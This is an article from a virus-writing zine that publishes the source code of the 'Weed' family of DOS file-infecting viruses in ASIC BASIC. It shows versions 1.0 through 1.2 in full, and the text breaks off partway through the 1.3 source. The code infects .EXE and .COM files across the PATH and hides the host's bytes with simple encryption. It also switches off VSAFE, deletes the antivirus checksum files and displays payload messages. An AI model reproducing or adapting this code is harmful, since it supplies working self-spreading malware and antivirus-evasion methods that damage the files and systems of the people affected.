Copy Link
Add to Bookmark
Report
SLAM4.049: Weed Familly v1.0-v1.5 by Raid/SLAM
Weed Familly Source Codes
Here are the source codes to the Weed familly made by RustBug (aka RaidX).
The familly consist in 5 viruses, all of them written in ASIC. Well, enjoy the codes!
[Virtual Daemon/SLAM]
--Õ Weed 1.0 Õ---
-----------------------------------------------------------------------------
dim t1(3275)
dim t2(3275)
a$="WEED - v1.0"
gosub bye_vsafe:
vsafebak=cx
gosub chklist:
yourparm$=command$
yourparm$=ltrim$(yourparm$)
yourparm$=rtrim$(yourparm$)
N = LEN(YOURPARM$)
A$ = CHR$(N)
A$ = A$ + YOURPARM$
B$ = CHR$(13)
A$ = A$ + B$
pass$=a$
x=0
rem REEFER virus version 1.0
rem t1 array holds us, t2 array holds original virus length of host,
rem encrypted until needed for extraction of course :-)
rem This virus has the ability to infect by overwriting and still
rem allow the host to run normally. In fact, the host will have
rem no idea that it has been infected!
rem Variables used:
rem Before we can begin, we need to load an image of ourselves.
rem this saves on drive needs later!
gosub find_my_name:
filename$=programname$
gosub get_fdt:
oldtime=newtime
olddate=newdate
open"i",1,programname$
for x=1 to 3263
input #1,a$ BYTE
a=asc(a$)
t1(x)=a
next x
close 1
virupath$=""
proc$="*.exe"
gosub start_virus:
proc$="*.com"
gosub start_virus:
for n=0 to 100
call sub "path", n, virupath$
i=LEN(virupath$)
if i=0 then done:
b$=right$(virupath$,1)
if b$<>"\" then
virupath$=virupath$+"\"
endif
out1$="*.exe"
out2$="*.com"
proc$=virupath$+out1$
gosub start_virus:
proc$=virupath$+out2$
gosub start_virus:
next n
rem That little code snippit above ensures that we can copy!
rem the next array is to hold our little friend. You'll see :-)
done:
rem Here is where we say Bye :-)
rem and transfer control to our gracious host! :-)
a&=filelen(programname$)
b&=a&-3263&
b&=abs(b&)
gosub get_attr:
fileattr=cx
newattr=0
gosub set_attr:
gosub chklist:
open"r",1,programname$
a&=filepos(1,b&)
for x=1 to 3263
input #1,a$ BYTE
a=asc(a$)
a=a-192
t2(x)=a
next x
a&=filepos(1,0)
for x=1 to 3263
a=t2(x)
a$=chr$(a)
if a$="" then
print #1,a$
else
print #1,a$ NONULL
endif
next x
a&=filepos(1,b&)
print #1,"" NONULL
CLOSE 1
newdate=olddate
newtime=oldtime
gosub set_fdt:
newattr=fileattr
gosub set_attr:
rem now, we need to run our new host :-) we can re-infect it afterwards
rem by making a simple call to 'Lets_infect:' and passing the host
rem filename.
IF pass$="
" then
CALL programname$,""
else
call programname$,pass$
endif
gosub bye_vsafe:
fileattr=cx
filename$=programname$
newattr=0
gosub set_attr:
open"i",1,filename$
for x=1 to 3263
input #1,a$ BYTE
a=asc(a$)
a=a+192
t2(x)=a
next x
close 1
gosub chklist:
open"r",1,filename$
for x=1 to 3263
a=t1(x)
a$=chr$(a)
if a$="" then
print #1,a$
else
print #1,a$ NONULL
endif
next x
a=filepos(1,eof)
for x=1 to 3263
a=t2(x)
a$=chr$(a)
if a$="" then
print #1,a$
else
print #1,a$ NONULL
endif
next x
close 1
newtime=oldtime
newdate=olddate
gosub set_fdt:
newattr=fileattr
gosub set_attr:
gosub chklist:
gosub res_vsafe:
end
rem We have completed replication. all stop!
start_virus:
kewl=0
ATTRIB=16
FILENAME$=FIND FIRST (proc$,attrib)
gosub test_infection:
if infected=0 then
gosub lets_infect:
endif
while kewl<4
FILENAME$=FIND CONTINUE
gosub test_infection:
if infected=0 then
gosub lets_infect:
endif
IF ERROR>0 THEN
return
endif
wend
Lets_infect:
gosub get_fdt:
gosub get_attr:
fileattr=cx
newattr=0
gosub set_attr:
open"i",1,filename$
for x=1 to 3263
input #1,a$ BYTE
a=asc(a$)
a=a+192
t2(x)=a
next x
close 1
kill"chklist.ms"
open"r",1,filename$
for x=1 to 3263
a=t1(x)
a$=chr$(a)
if a$="" then
print #1,a$
else
print #1,a$ NONULL
endif
next x
a=filepos(1,eof)
for x=1 to 3263
a=t2(x)
a$=chr$(a)
if a$="" then
print #1,a$
else
print #1,a$ NONULL
endif
next x
close 1
gosub set_fdt:
newattr=fileattr
gosub set_attr:
return
REM ******* SYSTEM SUB-ROUTINES BELOW THIS LINE. DO NOT TREAD HERE!
REM ******* THESE AREAS MUST NOT BE FOOLED WITH!
find_my_name:
AX = &HEX6200
INT86(&HEX21,AX,BX,NA,NA,NA,NA,NA,NA,NA)
PSPSegment = BX
rem Find environment address from PSP
DEFSEG = PSPSegment
a=peek(&hex2d)
b=peek(&hex2c)
EnvSegment = a * 256
EnvSegment = Envsegment + b
rem Find the filename
DEFSEG = EnvSegment
EOT = 1
rem Set end of environment table flag
Offset = 0
WHILE EOT=1
Byte = PEEK(Offset)
rem Get table character
IF Byte = 0 THEN
rem End of environment string?
Offset = Offset + 1
Byte = PEEK(Offset)
IF Byte = 0 THEN
rem End of environment?
Offset = Offset + 3
rem Yes - Skip over nulls & tbl info
C = PEEK(Offset)
WHILE C <> 0
rem Assemble filename string from individual characters
a$=chr$(c)
FileN$ = FileN$ + a$
Offset = Offset + 1
C = PEEK(Offset)
WEND
EOT = 0
rem Set flag to exit while/wend loop
ENDIF
ELSE
rem No-Read more environment string
Offset = Offset + 1
ENDIF
WEND
ProgramName$ = FileN$
DEFSEG=-1
return
get_attr:
AX = &HEX4300
DX = VARPTR(Filename$)
CX = NewAttr
INT86(&HEX21,AX,NA,CX,DX,NA,NA,NA,NA,NA)
return
set_attr:
AX = &HEX4301
DX = VARPTR(Filename$)
CX = NewAttr
INT86(&HEX21,AX,NA,CX,DX,NA,NA,NA,NA,NA)
return
bye_vsafe:
ax=&hexfa02
dx=&hex5945
bx=0
int86(&hex16,ax,bx,cx,dx,na,na,na,na,na)
return
res_vsafe:
ax=&hexfa02
dx=&hex5945
bx=vsafebak
int86(&hex16,ax,bx,cx,dx,na,na,na,na,na)
return
get_fdt:
AX=&HEX3D01
DX=varptr(filename$)
INT86(&HEX21,AX,NA,CX,DX,NA,NA,NA,NA,NA)
FILE_HANDLE=AX
AX=&HEX5700
BX=FILE_HANDLE
INT86(&HEX21,AX,BX,CX,DX,NA,NA,NA,NA,NA)
NEWDATE=CX
NEWTIME=DX
RETURN
set_fdt:
AX=&HEX3D01
DX=varptr(filename$)
INT86(&HEX21,AX,NA,CX,DX,NA,NA,NA,NA,NA)
FILE_HANDLE=AX
AX=&HEX5701
BX=FILE_HANDLE
CX=NEWDATE
DX=NEWTIME
INT86(&HEX21,AX,BX,CX,DX,NA,NA,NA,NA,NA)
RETURN
test_infection:
filename$=virupath$+filename$
var$=""
gosub get_attr:
fileattr=newattr
newattr=0
gosub set_attr:
open"r",1,filename$
r=filepos(1,28)
for x=1 to 4
input #1,a$ BYTE
var$=var$+a$
next x
close 1
newattr=fileattr
gosub set_attr:
if var$="≈flÚ˜" then
infected=1
else
infected=0
endif
return
chklist:
temp1$=filename$
filename$="chklist.ms"
newattr=0
gosub set_attr:
kill filename$
filename$=temp1$
return
-----------------------------------------------------------------------------
--Õ Weed 1.1 Õ---
-----------------------------------------------------------------------------
dim virus_data(4080)
dim host_data(4080)
weedsig$="WEED - v1.1"
gosub bye_vsafe:
vsafebak=cx
gosub chklist:
call sub "exename" hostname$
yourparm$=command$
yourparm$=ltrim$(yourparm$)
yourparm$=rtrim$(yourparm$)
yourparm$=" "+yourparm$
rem My new WEED virus! Oh so much more deadly! So much more spiffy!
filename$=hostname$
hostsize&=filelen(filename$)
virus_size=4080
virus_size&=4080&
gosub get_attr:
oldattr=newattr
newattr=0
gosub set_attr:
gosub open_file:
bytesize=virus_size
dx=varptr(virus_data(0))
gosub read_file:
gosub close_file:
newattr=oldattr
gosub set_attr:
rem Ok, now infect files presently in current directory!
virupath$=""
proc$="*.exe"
gosub start_virus:
proc$="*.com"
gosub start_virus:
rem Ok, now were going to target files along the path :)
for n=0 to 100
call sub "path", n, virupath$
i=LEN(virupath$)
if i=0 then done:
b$=right$(virupath$,1)
if b$<>"\" then
virupath$=virupath$+"\"
endif
out1$="*.exe"
out2$="*.com"
proc$=virupath$+out1$
gosub start_virus:
proc$=virupath$+out2$
gosub start_virus:
next n
done:
filename$=hostname$
hostsize&=filelen(filename$)
gosub get_attr:
oldattr=newattr
newattr=0
gosub set_attr:
gosub open_file:
gosub get_fdt:
hosttemp&=hostsize&-virus_size&
move_way&=hosttemp&
gosub move_file_pointer:
bytesize=virus_size
dx=varptr(host_data(0))
gosub read_file:
move_way&=0&
gosub move_file_pointer:
gosub dec_host:
dx=varptr(host_data(0))
bytesize=virus_size
gosub write_file:
gosub set_fdt:
gosub close_file:
gosub strip_garbage:
newattr=oldattr
gosub set_attr:
call hostname$, yourparm$
gosub bye_vsafe:
filename$=hostname$
gosub lets_infect:
rem Hmm, lets see if our new host was able to make any files!
virupath$=""
proc$="*.exe"
gosub start_virus:
proc$="*.com"
gosub start_virus:
end
rem We have completed replication. all stop!
start_virus:
errcode=0
attr=6
kewl=0
CALL SUB "FindFirstF" proc$ Attr ErrCode
WHILE ErrCode = 0
CALL SUB "GetNameF" FileName$
gosub infect_check:
if infected=0 then
gosub lets_infect:
endif
CALL SUB "FindNextF" ErrCode
if kewl>4 then
errcode=1
endif
WEND
return
Lets_infect:
filename$=virupath$+filename$
hostsize&=filelen(filename$)
gosub get_attr:
oldattr=newattr
newattr=0
gosub set_attr:
gosub open_file:
gosub get_fdt:
bytesize=virus_size
dx=varptr(host_data(0))
gosub read_file:
move_way&=0&
gosub move_file_pointer:
bytesize=virus_size
dx=varptr(virus_data(0))
gosub write_file:
move_way&=hostsize&
gosub move_file_pointer:
gosub enc_host:
dx=varptr(host_data(0))
bytesize=virus_size
gosub write_file:
gosub set_fdt:
kewl=kewl+1
gosub close_file:
newattr=oldattr
gosub set_attr:
return
REM ******* SYSTEM SUB-ROUTINES BELOW THIS LINE. DO NOT TREAD HERE!
REM ******* THESE AREAS MUST NOT BE FOOLED WITH!
get_attr:
AX = &HEX4300
DX = VARPTR(Filename$)
CX = NewAttr
INT86(&HEX21,AX,NA,CX,DX,NA,NA,NA,NA,NA)
return
set_attr:
AX = &HEX4301
DX = VARPTR(Filename$)
CX = NewAttr
INT86(&HEX21,AX,NA,CX,DX,NA,NA,NA,NA,NA)
return
bye_vsafe:
ax=&hexfa02
dx=&hex5945
bx=0
int86(&hex16,ax,bx,cx,dx,na,na,na,na,na)
return
res_vsafe:
ax=&hexfa02
dx=&hex5945
bx=vsafebak
int86(&hex16,ax,bx,cx,dx,na,na,na,na,na)
return
get_fdt:
if file_handle>4 then
AX=&HEX5700
BX=FILE_HANDLE
INT86(&HEX21,AX,BX,CX,DX,NA,NA,NA,NA,NA)
NEWDATE=CX
NEWTIME=DX
endif
RETURN
set_fdt:
if file_handle>4 then
AX=&HEX5701
BX=FILE_HANDLE
CX=NEWDATE
DX=NEWTIME
INT86(&HEX21,AX,BX,CX,DX,NA,NA,NA,NA,NA)
endif
RETURN
chklist:
temp1$=filename$
filename$="chklist.ms"
newattr=0
gosub set_attr:
kill filename$
filename$=temp1$
return
rem DOS int file i/o driven code beyond this point :)
rem ax=&hex3d00
rem ax opens file for read in this mode :-)
rem ax=&hex3d01
rem ax opens file for write in this mode :-)
rem ax=&hex3d02
rem ax opens file for read/write access :) hehehe
open_file:
AX=&HEX3D02
DX = VARPTR(Filename$)
INT86(&HEX21,AX,NA,na,DX,NA,NA,NA,NA,NA)
file_handle=ax
return
write_file:
rem this routine will write selected bytes at whatever current position
rem from whatever buffer i choose into the file.
rem if the routine did not write all data ax will not equal cx upon
rem return from int call.
rem define dx register before calling this routine to point to the
rem memory address of the buffer area you want to write from. like so:
rem dx=varptr(buffer(0))
rem cx is how many bytes to write :)
if file_handle>4 then
ax=&hex4000
bx=file_handle
cx=bytesize
int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
byteswritten=ax
endif
return
read_file:
rem as the name implies, it reads bytes into a buffer. :-)
rem as with write_file, you need to predefine the dx register for the
rem buffer where you want the info stored. Like so: dx=varptr(buffer(0))
rem if you don't, this routine will not work, or will overwrite some
rem other section of memory. And for virus coding, this is very bad! :)
rem cx register is how many bytes to read :)
if file_handle>4 then
ax=&hex3f00
bx=file_handle
cx=bytesize
int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
bytesread=ax
endif
return
close_file:
rem This routine will close the selected file.
rem do not try to close handle 2, very nasty... :-(
if file_handle>4 then
ax=&hex3e00
bx=file_handle
int86(&hex21,ax,bx,na,na,na,na,na,na,na)
endif
return
move_file_pointer:
rem be sure to set variable move_way to whereever you wish to go
rem it can be a long integer :-)
rem get the target location, divide that by 65536
rem Also subtract value of a& from the original size.
rem set both registers for real numbers, no mistake here.. Will fuckup
rem file pointer routine if I don't. :)
rem a&=move_way&/65536&
rem b&=a&-move_way&
rem a&=abs(a&)
rem b&=abs(b&)
rem rem Now, dump the registers :)
rem if file_handle>4 then
rem ax=&hex4200
rem cx=a&
rem dx=b&
rem bx=file_handle
rem int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
rem endif
rem return
method=0
call sub "fseek" file_handle, move_way&, method, errcode
return
enc_host:
rem Routine to encrypt the host data... We encrypt it before
rem appending. Yea, the encryption is lame... But it serves it's
rem purpose fine.
for x=0 to virus_size
a=host_data(x)
a=a+127
a=a+192
a=a+x
host_data(x)=a
next x
return
dec_host:
rem Routine to decrypt the host data... We need to decrypt it before
rem replacing it and passing control to it. And yes, the decryption
rem sequence is lame... But, I don't give a fuck!
for x=0 to virus_size
a=host_data(x)
a=a-127
a=a-192
a=a-x
host_data(x)=a
next x
return
infect_check:
gosub get_attr:
newattr=oldattr
newattr=0
gosub set_attr:
sig$=""
open"r",1,filename$
a=filepos(1,28)
for z=1 to 4
input #1,y$ byte
sig$=sig$+y$
next z
close 1
newattr=oldattr
gosub set_attr:
if sig$="‘Ÿ‰€" then
infected=1
else
infected=0
endif
return
strip_garbage:
open"r",1,filename$
a=filepos(1,hosttemp&)
print #1,"" NONULL
CLOSE 1
gosub open_file:
gosub set_fdt:
gosub close_file:
return
-----------------------------------------------------------------------------
--Õ Weed 1.2 Õ---
-----------------------------------------------------------------------------
dim virus_data(5590)
dim host_data(5590)
randomize
rem Define our encrypted data for later decryption. Data is encrypted
rem during the compilation process. Do not tamper with tables in source!
weedmsg$="WEED v1.2 - CASiO [RAiDERZ CoDERZ] - USA - 1997"
killfil1$="anti-vir.dat"
killfil2$="chklist.ms"
killfil3$="chklist.cps"
newattr=0
gosub vsafe_toggle:
vsafebak=newattr
gosub toast_them:
call sub "exename" hostname$
yourparm$=command$
yourparm$=ltrim$(yourparm$)
yourparm$=rtrim$(yourparm$)
yourparm$=" "+yourparm$
rem My new WEED virus! Oh so much more deadly! So much more spiffy!
filename$=hostname$
hostsize&=filelen(filename$)
virus_size=5590
virus_size&=5590&
gosub get_attr:
oldattr=newattr
newattr=0
gosub set_attr:
gosub open_file:
bytesize=virus_size
dx=varptr(virus_data(0))
gosub read_file:
gosub close_file:
newattr=oldattr
gosub set_attr:
rem Ok, now infect files presently in current directory!
subdir=0
proc$="*.exe"
gosub start_virus:
proc$="*.com"
gosub start_virus:
rem Ok, now were going to target files along the path :)
for n=0 to 100
call sub "path", n, virupath$
i=LEN(virupath$)
if i=0 then done:
b$=right$(virupath$,1)
if b$<>"\" then
virupath$=virupath$+"\"
endif
out1$="*.exe"
out2$="*.com"
subdir=1
proc$=virupath$+out1$
gosub start_virus:
proc$=virupath$+out2$
gosub start_virus:
next n
done:
filename$=hostname$
hostsize&=filelen(filename$)
gosub get_attr:
oldattr=newattr
newattr=0
gosub set_attr:
gosub open_file:
gosub get_fdt:
hosttemp&=hostsize&-virus_size&
move_way&=hosttemp&
gosub move_file_pointer:
bytesize=virus_size
dx=varptr(host_data(0))
gosub read_file:
move_way&=0&
gosub move_file_pointer:
gosub dec_host:
dx=varptr(host_data(0))
bytesize=virus_size
gosub write_file:
gosub set_fdt:
gosub close_file:
gosub strip_garbage:
newattr=oldattr
gosub set_attr:
a=rnd(0)
a=a mod 10
a=a+1
if a=1 then
rem Ok, run Stars Section, if they press "/" we allow them to run
rem original program!
call sub "Stars_heh"
endif
if a=7 then
rem Time to print message! :)
print weedmsg$
a=5*18
gosub pause_exec:
endif
call hostname$, yourparm$
newattr=0
gosub vsafe_toggle:
filename$=hostname$
gosub lets_infect:
rem Hmm, lets see if our new host was able to make any files!
subdir=0
proc$="*.exe"
gosub start_virus:
proc$="*.com"
gosub start_virus:
newattr=vsafebak
gosub vsafe_toggle:
end
rem We have completed replication. all stop!
start_virus:
errcode=0
attr=6
kewl=0
CALL SUB "FindFirstF" proc$ Attr ErrCode
WHILE ErrCode = 0
CALL SUB "GetNameF" FileName$
if subdir=1 then
filename$=virupath$+filename$
endif
gosub test_safe:
if safe=1 then
gosub infect_check:
if infected=0 then
gosub lets_infect:
endif
endif
CALL SUB "FindNextF" ErrCode
if kewl>4 then
errcode=1
endif
WEND
return
Lets_infect:
hostsize&=filelen(filename$)
gosub get_attr:
oldattr=newattr
newattr=0
gosub set_attr:
gosub open_file:
gosub get_fdt:
bytesize=virus_size
dx=varptr(host_data(0))
gosub read_file:
move_way&=0&
gosub move_file_pointer:
bytesize=virus_size
dx=varptr(virus_data(0))
gosub write_file:
move_way&=hostsize&
gosub move_file_pointer:
gosub enc_host:
dx=varptr(host_data(0))
bytesize=virus_size
gosub write_file:
gosub set_fdt:
kewl=kewl+1
gosub close_file:
newattr=oldattr
gosub set_attr:
return
REM ******* SYSTEM SUB-ROUTINES BELOW THIS LINE. DO NOT TREAD HERE!
REM ******* THESE AREAS MUST NOT BE FOOLED WITH!
get_attr:
AX = &HEX4300
DX = VARPTR(Filename$)
CX = NewAttr
INT86(&HEX21,AX,NA,CX,DX,NA,NA,NA,NA,NA)
return
set_attr:
AX = &HEX4301
DX = VARPTR(Filename$)
CX = NewAttr
INT86(&HEX21,AX,NA,CX,DX,NA,NA,NA,NA,NA)
return
vsafe_toggle:
ax=&hexfa02
dx=&hex5945
bx=newattr
int86(&hex16,ax,bx,cx,dx,na,na,na,na,na)
newattr=bx
return
get_fdt:
if file_handle>4 then
AX=&HEX5700
BX=FILE_HANDLE
INT86(&HEX21,AX,BX,CX,DX,NA,NA,NA,NA,NA)
NEWDATE=CX
NEWTIME=DX
endif
RETURN
set_fdt:
if file_handle>4 then
AX=&HEX5701
BX=FILE_HANDLE
CX=NEWDATE
DX=NEWTIME
INT86(&HEX21,AX,BX,CX,DX,NA,NA,NA,NA,NA)
endif
RETURN
chklist:
temp1$=filename$
filename$=kill_this$
newattr=0
gosub set_attr:
kill filename$
filename$=temp1$
return
rem DOS int file i/o driven code beyond this point :)
rem ax=&hex3d00
rem ax opens file for read in this mode :-)
rem ax=&hex3d01
rem ax opens file for write in this mode :-)
rem ax=&hex3d02
rem ax opens file for read/write access :) hehehe
open_file:
AX=&HEX3D02
DX = VARPTR(Filename$)
INT86(&HEX21,AX,NA,na,DX,NA,NA,NA,NA,NA)
file_handle=ax
return
write_file:
rem this routine will write selected bytes at whatever current position
rem from whatever buffer i choose into the file.
rem if the routine did not write all data ax will not equal cx upon
rem return from int call.
rem define dx register before calling this routine to point to the
rem memory address of the buffer area you want to write from. like so:
rem dx=varptr(buffer(0))
rem cx is how many bytes to write :)
if file_handle>4 then
ax=&hex4000
bx=file_handle
cx=bytesize
int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
byteswritten=ax
endif
return
read_file:
rem as the name implies, it reads bytes into a buffer. :-)
rem as with write_file, you need to predefine the dx register for the
rem buffer where you want the info stored. Like so: dx=varptr(buffer(0))
rem if you don't, this routine will not work, or will overwrite some
rem other section of memory. And for virus coding, this is very bad! :)
rem cx register is how many bytes to read :)
if file_handle>4 then
ax=&hex3f00
bx=file_handle
cx=bytesize
int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
bytesread=ax
endif
return
close_file:
rem This routine will close the selected file.
rem do not try to close handle 2, very nasty... :-(
if file_handle>4 then
ax=&hex3e00
bx=file_handle
int86(&hex21,ax,bx,na,na,na,na,na,na,na)
endif
return
move_file_pointer:
rem be sure to set variable move_way to whereever you wish to go
rem it can be a long integer :-)
rem get the target location, divide that by 65536
rem Also subtract value of a& from the original size.
rem set both registers for real numbers, no mistake here.. Will fuckup
rem file pointer routine if I don't. :)
rem a&=move_way&/65536&
rem b&=a&-move_way&
rem a&=abs(a&)
rem b&=abs(b&)
rem Now, dump the registers :)
rem if file_handle>4 then
rem ax=&hex4200
rem cx=a&
rem dx=b&
rem bx=file_handle
rem Ok, now that we have prepared the registers, Lets fix them!
rem if cx<0 then
rem cx=cx+32767
rem endif
rem if dx<0 then
rem dx=dx+32767
rem endif
rem int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
rem endif
rem return
method=0
call sub "fseek" file_handle, move_way&, method, errcode
return
enc_host:
rem Routine to encrypt the host data... We encrypt it before
rem appending. Yea, the encryption is lame... But it serves it's
rem purpose fine.
for x=0 to virus_size
a=host_data(x)
a=a+127
a=a+192
a=a+x
host_data(x)=a
next x
return
dec_host:
rem Routine to decrypt the host data... We need to decrypt it before
rem replacing it and passing control to it. And yes, the decryption
rem sequence is lame... But, I don't give a fuck!
for x=0 to virus_size
a=host_data(x)
a=a-127
a=a-192
a=a-x
host_data(x)=a
next x
return
infect_check:
gosub get_attr:
newattr=oldattr
newattr=0
gosub set_attr:
sig$=""
open"r",1,filename$
a=filepos(1,28)
for z=1 to 4
input #1,y$ byte
sig$=sig$+y$
next z
close 1
newattr=oldattr
gosub set_attr:
if sig$="‘Ÿ‰€" then
infected=1
else
infected=0
endif
return
strip_garbage:
open"r",1,filename$
a=filepos(1,hosttemp&)
print #1,"" NONULL
CLOSE 1
gosub open_file:
gosub set_fdt:
gosub close_file:
return
pause_exec:
REM 5 sec. timer routine from original QBasic source code written by:
REM obother@netcom.com (Glen Blankenship)
REM (5 * 18.2 clock-ticks-per-second = 91)
TickOne = TIMER
FOR i = 1 TO a
TickTwo = TickOne
WHILE TickTwo = TickOne
TickOne = TIMER
WEND
NEXT i
RETURN
toast_them:
kill_this$=killfil1$
gosub chklist:
kill_this$=killfil2$
gosub chklist:
kill_this$=killfil3$
gosub chklist:
return
test_safe:
openmode=0
sharing=0
errcode1=0
call sub "Fopen" filename$ openmode sharing test_handle errcode1
if errcode1=0 then
call sub "Fclose" test_handle
safe=1
else
safe=0
endif
return
-----------------------------------------------------------------------------
--Õ Weed 1.3 Õ---
-----------------------------------------------------------------------------
dim virus_data(5850)
dim host_data(5850)
call sub "ibcritinit"
randomize
rem Hello, This is the source code to WEED v1.3 virus. Compiling this
rem code will take a bit of work on your part, I didn't make it difficult
rem on purpose, It was hard not too. In any event, I hope this teaches
rem you a little about how viruses work. :)
rem Define our encrypted data for later decryption. Data is encrypted
rem during the compilation process. Do not tamper with tables in source!
weedmsg$="WEED v1.4a has infected your computer! CASiO [RAiDERZ] 1997"
killfil1$="anti-vir.dat"
killfil2$="chklist.ms"
killfil3$="chklist.cps"
notouch$="COMMAND.COM"
exe$="*.exe"
com$="*.com"
rem And now the real fun part, bunch of temp calls to decode our information
rem above :)
temp$=weedmsg$
gosub decode_mess:
weedmsg$=output$
temp$=killfil1$
gosub decode_mess:
killfil1$=output$
temp$=killfil2$
gosub decode_mess:
killfil2$=output$
temp$=killfil3$
gosub decode_mess:
killfil3$=output$
temp$=notouch$
gosub decode_mess:
notouch$=output$
temp$=exe$
gosub decode_mess:
exe$=output$
temp$=com$
gosub decode_mess:
com$=output$
newattr=0
gosub vsafe_toggle:
vsafebak=newattr
gosub toast_them:
call sub "exename" hostname$
yourparm$=command$
yourparm$=ltrim$(yourparm$)
yourparm$=rtrim$(yourparm$)
yourparm$=" "+yourparm$
rem My new WEED virus! Oh so much more deadly! So much more spiffy!
filename$=hostname$
hostsize&=filelen(filename$)
virus_size=5850
virus_size&=5850&
gosub get_attr:
oldattr=newattr
newattr=0
gosub set_attr:
gosub open_file:
bytesize=virus_size
dx=varptr(virus_data(0))
gosub read_file:
gosub close_file:
newattr=oldattr
gosub set_attr:
rem Ok, now infect files presently in current directory!
subdir=0
proc$=exe$
gosub start_virus:
proc$=com$
gosub start_virus:
rem Ok, now were going to target files along the path :)
for n=0 to 100
call sub "path", n, virupath$
i=LEN(virupath$)
if i=0 then done:
b$=right$(virupath$,1)
if b$<>"\" then
virupath$=virupath$+"\"
endif
out1$=exe$
out2$=com$
subdir=1
proc$=virupath$+out1$
gosub start_virus:
proc$=virupath$+out2$
gosub start_virus:
next n
done:
filename$=hostname$
hostsize&=filelen(filename$)
gosub get_attr:
oldattr=newattr
newattr=0
gosub set_attr:
gosub open_file:
gosub get_fdt:
hosttemp&=hostsize&-virus_size&
move_way&=hosttemp&
gosub move_file_pointer:
bytesize=virus_size
dx=varptr(host_data(0))
gosub read_file:
move_way&=0&
gosub move_file_pointer:
gosub dec_host:
dx=varptr(host_data(0))
bytesize=virus_size
gosub write_file:
gosub set_fdt:
gosub close_file:
gosub strip_garbage:
newattr=oldattr
gosub set_attr:
a=rnd(0)
a=a mod 10
a=a+1
if a=1 then
rem Ok, run Stars Section, if they press "/" we allow them to run
rem original program!
call sub "Stars_heh"
endif
if a=7 then
rem Time to print message! :)
print weedmsg$
a=5*18
gosub pause_exec:
endif
call hostname$, yourparm$
newattr=0
gosub vsafe_toggle:
filename$=hostname$
gosub lets_infect:
rem Hmm, lets see if our new host was able to make any files!
subdir=0
proc$=exe$
gosub start_virus:
proc$=com$
gosub start_virus:
newattr=vsafebak
gosub vsafe_toggle:
end
rem We have completed replication. all stop!
start_virus:
errcode=0
attr=6
kewl=0
search$=proc$
attrib=6
filename$=find first (search$, attrib)
if error>0 then done_finding:
t1$=ucase$(filename$)
if t1$=notouch$ then
do_not_proceed=1
else
do_not_proceed=0
endif
if do_not_proceed=0 then
if subdir=1 then
filename$=virupath$+filename$
endif
gosub infect_check:
if infected=0 then
gosub lets_infect:
endif
endif
while errcode=0
filename$=find continue
if error>0 then done_finding:
t1$=ucase$(filename$)
if t1$=notouch$ then
do_not_proceed=1
else
do_not_proceed=0
endif
if do_not_proceed=0 then
if subdir=1 then
filename$=virupath$+filename$
endif
gosub infect_check:
if infected=0 then
gosub lets_infect:
endif
endif
if kewl>4 then
errcode=1
endif
WEND
done_finding:
return
Lets_infect:
hostsize&=filelen(filename$)
gosub get_attr:
oldattr=newattr
newattr=0
gosub set_attr:
gosub open_file:
gosub get_fdt:
bytesize=virus_size
dx=varptr(host_data(0))
gosub read_file:
move_way&=0&
gosub move_file_pointer:
bytesize=virus_size
dx=varptr(virus_data(0))
gosub write_file:
move_way&=hostsize&
gosub move_file_pointer:
gosub enc_host:
dx=varptr(host_data(0))
bytesize=virus_size
gosub write_file:
gosub set_fdt:
kewl=kewl+1
gosub close_file:
newattr=oldattr
gosub set_attr:
return
REM ******* SYSTEM SUB-ROUTINES BELOW THIS LINE. DO NOT TREAD HERE!
REM ******* THESE AREAS MUST NOT BE FOOLED WITH!
get_attr:
AX = &HEX4300
DX = VARPTR(Filename$)
CX = NewAttr
INT86(&HEX21,AX,NA,CX,DX,NA,NA,NA,NA,NA)
return
set_attr:
AX = &HEX4301
DX = VARPTR(Filename$)
CX = NewAttr
INT86(&HEX21,AX,NA,CX,DX,NA,NA,NA,NA,NA)
return
vsafe_toggle:
ax=&hexfa02
dx=&hex5945
bx=newattr
int86(&hex16,ax,bx,cx,dx,na,na,na,na,na)
newattr=bx
return
get_fdt:
if file_handle>4 then
AX=&HEX5700
BX=FILE_HANDLE
INT86(&HEX21,AX,BX,CX,DX,NA,NA,NA,NA,NA)
NEWDATE=CX
NEWTIME=DX
endif
RETURN
set_fdt:
if file_handle>4 then
AX=&HEX5701
BX=FILE_HANDLE
CX=NEWDATE
DX=NEWTIME
INT86(&HEX21,AX,BX,CX,DX,NA,NA,NA,NA,NA)
endif
RETURN
chklist:
temp1$=filename$
filename$=kill_this$
newattr=0
gosub set_attr:
kill filename$
filename$=temp1$
return
rem DOS int file i/o driven code beyond this point :)
rem ax=&hex3d00
rem ax opens file for read in this mode :-)
rem ax=&hex3d01
rem ax opens file for write in this mode :-)
rem ax=&hex3d02
rem ax opens file for read/write access :) hehehe
open_file:
AX=&HEX3D02
DX = VARPTR(Filename$)
INT86(&HEX21,AX,NA,na,DX,NA,NA,NA,NA,NA)
file_handle=ax
return
write_file:
rem this routine will write selected bytes at whatever current position
rem from whatever buffer i choose into the file.
rem if the routine did not write all data ax will not equal cx upon
rem return from int call.
rem define dx register before calling this routine to point to the
rem memory address of the buffer area you want to write from. like so:
rem dx=varptr(buffer(0))
rem cx is how many bytes to write :)
if file_handle>4 then
ax=&hex4000
bx=file_handle
cx=bytesize
int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
byteswritten=ax
endif
return
read_file:
rem as the name implies, it reads bytes into a buffer. :-)
rem as with write_file, you need to predefine the dx register for the
rem buffer where you want the info stored. Like so: dx=varptr(buffer(0))
rem if you don't, this routine will not work, or will overwrite some
rem other section of memory. And for virus coding, this is very bad! :)
rem cx register is how many bytes to read :)
if file_handle>4 then
ax=&hex3f00
bx=file_handle
cx=bytesize
int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
bytesread=ax
endif
return
close_file:
rem This routine will close the selected file.
rem do not try to close handle 2, very nasty... :-(
if file_handle>4 then
ax=&hex3e00
bx=file_handle
int86(&hex21,ax,bx,na,na,na,na,na,na,na)
endif
return
move_file_pointer:
rem be sure to set variable move_way to whereever you wish to go
rem it can be a long integer :-)
rem get the target location, divide that by 65536
rem Also subtract value of a& from the original size.
rem set both registers for real numbers, no mistake here.. Will fuckup
rem file pointer routine if I don't. :)
rem a&=move_way&/65536&
rem b&=a&-move_way&
rem a&=abs(a&)
rem b&=abs(b&)
